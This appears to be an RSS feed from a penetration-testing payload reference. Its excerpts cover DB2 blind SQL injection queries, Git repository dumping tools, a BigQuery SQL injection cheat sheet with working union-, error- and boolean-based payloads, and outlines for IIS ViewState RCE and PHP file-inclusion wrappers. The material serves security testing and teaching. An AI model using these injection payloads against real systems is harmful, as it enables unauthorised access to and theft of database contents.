&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;xml2clob&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;xmelement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sysibm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="db2-blind-based" class="anchored-heading"&gt;DB2 Blind Based&lt;a class="heading-anchor" href="#db2-blind-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Substring&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select substr('abc',2,1) FROM sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;ASCII value&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select chr(65) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;CHAR to ASCII&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select ascii('A') from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Select Nth Row&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Bitwise AND&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select bitand(1,0) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Bitwise AND NOT&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select bitandnot(1,0) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Bitwise OR&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select bitor(1,0) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Bitwise XOR&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select bitxor(1,0) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Bitwise NOT&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select bitnot(1,0) from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="db2-time-based" class="anchored-heading"&gt;DB2 Time Based&lt;a class="heading-anchor" href="#db2-time-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Heavy queries, if user starts with ascii 68 (&amp;lsquo;D&amp;rsquo;), the heavy query will be executed, delaying the response.&lt;/p&gt;</description></item><item><title>Git</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/git/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/git/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#recovering-file-contents-from-gitlogshead"&gt;Recovering file contents from .git/logs/HEAD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#recovering-file-contents-from-gitindex"&gt;Recovering file contents from .git/index&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#automatic-recovery"&gt;Automatic recovery&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#git-dumperpy"&gt;git-dumper.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#diggitpy"&gt;diggit.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gogitdumper"&gt;GoGitDumper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rip-git"&gt;rip-git&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#githack"&gt;GitHack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gittools"&gt;GitTools&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#harvesting-secrets"&gt;Harvesting secrets&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#noseyparker"&gt;noseyparker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#trufflehog"&gt;trufflehog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#yar"&gt;Yar&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gitrob"&gt;Gitrob&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gitleaks"&gt;Gitleaks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="methodology" class="anchored-heading"&gt;Methodology&lt;a class="heading-anchor" href="#methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The following examples will create either a copy of the .git or a copy of the current commit.&lt;/p&gt;
&lt;p&gt;Check for the following files, if they exist you can extract the .git folder.&lt;/p&gt;</description></item><item><title>Google BigQuery SQL Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/bigquery-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/bigquery-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#detection"&gt;Detection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bigquery-comment"&gt;BigQuery Comment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bigquery-union-based"&gt;BigQuery Union Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bigquery-error-based"&gt;BigQuery Error Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bigquery-boolean-based"&gt;BigQuery Boolean Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bigquery-time-based"&gt;BigQuery Time Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="detection" class="anchored-heading"&gt;Detection&lt;a class="heading-anchor" href="#detection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Use a classic single quote to trigger an error: &lt;code&gt;'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Identify BigQuery using backtick notation: &lt;code&gt;SELECT .... FROM `` AS ...&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SELECT @@project_id&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Gathering project id&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Gathering all dataset names&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;select * from project_id.dataset_name.table_name&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Gathering data from specific project id &amp;amp; dataset&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="bigquery-comment" class="anchored-heading"&gt;BigQuery Comment&lt;a class="heading-anchor" href="#bigquery-comment" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Type&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;#&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Hash comment&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;/* PostgreSQL Comment */&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;C-style comment&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="bigquery-union-based" class="anchored-heading"&gt;BigQuery Union Based&lt;a class="heading-anchor" href="#bigquery-union-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;UNION&lt;/span&gt; &lt;span class="n"&gt;ALL&lt;/span&gt; &lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="nv"&gt;@@project_id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;T1&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt;&lt;span class="c"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt; &lt;span class="n"&gt;LIMIT&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="n"&gt;UNION&lt;/span&gt; &lt;span class="n"&gt;ALL&lt;/span&gt; &lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;asd&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;T1&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt;&lt;span class="c"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt; &lt;span class="n"&gt;LIMIT&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="n"&gt;UNION&lt;/span&gt; &lt;span class="n"&gt;ALL&lt;/span&gt; &lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="nv"&gt;@@project_id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;T1&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt;&lt;span class="c"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt; &lt;span class="n"&gt;UNION&lt;/span&gt; &lt;span class="n"&gt;ALL&lt;/span&gt; &lt;span class="nb"&gt;SELECT &lt;/span&gt;&lt;span class="n"&gt;column_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="n"&gt;FROM&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;column_name&lt;/span&gt; &lt;span class="n"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;new_name&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;&lt;span class="n"&gt;project_id&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dataset_name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;table_name&lt;/span&gt;&lt;span class="p"&gt;`)&lt;/span&gt; &lt;span class="n"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="nb"&gt;GROUP &lt;/span&gt;&lt;span class="n"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;column_name&lt;/span&gt;&lt;span class="c"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="bigquery-error-based" class="anchored-heading"&gt;BigQuery Error Based&lt;a class="heading-anchor" href="#bigquery-error-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;' OR if(1/(length((select('a')))-1)=1,true,false) OR '&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Division by zero&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;select CAST(@@project_id AS INT64)&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Casting&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="bigquery-boolean-based" class="anchored-heading"&gt;BigQuery Boolean Based&lt;a class="heading-anchor" href="#bigquery-boolean-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39; WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)=&amp;#39;&lt;/span&gt;&lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="c"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="bigquery-time-based" class="anchored-heading"&gt;BigQuery Time Based&lt;a class="heading-anchor" href="#bigquery-time-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Time based functions does not exist in the BigQuery syntax.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://web.archive.org/web/20260222133721/https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac"&gt;BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://web.archive.org/web/20251109151650/https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax"&gt;BigQuery Documentation - Query Syntax - October 30, 2024&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://web.archive.org/web/20170524193028/https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators"&gt;BigQuery Documentation - Functions and Operators - October 30, 2024&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://web.archive.org/web/20260225150843/https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/"&gt;Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Hash Cracking</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/hash-cracking/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/hash-cracking/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/"&gt;InternalAllTheThings/cheatsheets/hash-cracking&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat"&gt;Hashcat&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hashcat.net/wiki/doku.php?id=example_hashes"&gt;Hashcat Example Hashes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat-install"&gt;Hashcat Install&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#mask-attack"&gt;Mask attack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#dictionary"&gt;Dictionary&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/openwall/john"&gt;John&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#john-usage"&gt;Usage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#rainbow-tables"&gt;Rainbow tables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#tips-and-tricks"&gt;Tips and Tricks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#online-cracking-resources"&gt;Online Cracking Resources&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>HTML Smuggling</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/html-smuggling/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/html-smuggling/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/"&gt;InternalAllTheThings/redteam/access/html-smuggling&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#description"&gt;Description&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#executable-storage"&gt;Executable Storage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>IIS Machine Keys</title><link>https://bokkapig.pages.dev/refs/payloads/api-key-leaks/iis-machine-keys/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/api-key-leaks/iis-machine-keys/</guid><description>&lt;blockquote&gt;
&lt;p&gt;That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#viewstate-format"&gt;Viewstate Format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#machine-key-format-and-locations"&gt;Machine Key Format And Locations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#identify-known-machine-key"&gt;Identify Known Machine Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#decode-viewstate"&gt;Decode ViewState&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#generate-viewstate-for-rce"&gt;Generate ViewState For RCE&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mac-is-not-enabled"&gt;MAC Is Not Enabled&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mac-is-enabled-and-encryption-is-disabled"&gt;MAC Is Enabled And Encryption Is Disabled&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mac-is-enabled-and-encryption-is-enabled"&gt;MAC Is Enabled And Encryption Is Enabled&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#edit-cookies-with-the-machine-key"&gt;Edit Cookies With The Machine Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="viewstate-format" class="anchored-heading"&gt;Viewstate Format&lt;a class="heading-anchor" href="#viewstate-format" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.&lt;/p&gt;</description></item><item><title>Inclusion Using Wrappers</title><link>https://bokkapig.pages.dev/refs/payloads/file-inclusion/wrappers/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/file-inclusion/wrappers/</guid><description>&lt;p&gt;A wrapper in the context of file inclusion vulnerabilities refers to the protocol or method used to access or include a file. Wrappers are often used in PHP or other server-side languages to extend how file inclusion functions, enabling the use of protocols like HTTP, FTP, and others in addition to the local filesystem.&lt;/p&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#wrapper-phpfilter"&gt;Wrapper php://filter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-data"&gt;Wrapper data://&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-expect"&gt;Wrapper expect://&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-input"&gt;Wrapper input://&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-zip"&gt;Wrapper zip://&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-phar"&gt;Wrapper phar://&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#phar-archive-structure"&gt;PHAR Archive Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#phar-deserialization"&gt;PHAR Deserialization&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#wrapper-converticonv-and-dechunk"&gt;Wrapper convert.iconv:// and dechunk://&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#leak-file-content-from-error-based-oracle"&gt;Leak file content from error-based oracle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#leak-file-content-inside-a-custom-format-output"&gt;Leak file content inside a custom format output&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
